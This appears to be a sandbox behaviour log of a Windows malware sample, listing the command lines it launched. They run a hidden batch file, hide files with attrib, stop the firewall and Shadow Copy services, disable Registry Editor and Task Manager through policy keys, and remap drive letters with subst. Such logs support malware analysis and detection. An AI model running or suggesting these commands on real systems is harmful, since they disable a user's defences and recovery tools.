[0x00000ae8]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = "C:\WINDOWS\system32\cmd.exe" /c ""C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.tmp\6.bat" "C:\Documents and Settings\Administrator\Local Settings\%temp%\****.exe"" [0x00000b08]ImagePath = C:\WINDOWS\system32\attrib.exe, CmdLine = attrib C:\WINDOWS\system32\cmd.bat +r +s +h [0x00000b38]ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net stop sharedaccess [0x00000b58]ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 stop sharedaccess [0x00000b90]ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net stop Shadow" "System" "Service [0x00000bb8]ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 stop Shadow" "System" "Service [0x00000be4]ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add [0x00000bf8]ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add [0x00000c00]ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000001 /f [0x00000c08]ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f [0x00000d7c]ImagePath = C:\WINDOWS\system32\subst.exe, CmdLine = subst c: d:\fly [0x00000d90]ImagePath = C:\WINDOWS\system32\subst.exe, CmdLine = subst d: d:\fly [0x00000d98]ImagePath = C:\WINDOWS\system32\subst.exe, CmdLine = subst e: d:\fly [0x00000da4]ImagePath = C:\WINDOWS\system32\subst.exe, CmdLine = subst f: d:\fly [0x00000db0]ImagePath = C:\WINDOWS\system32\subst.exe, CmdLine = subst g: d:\fly |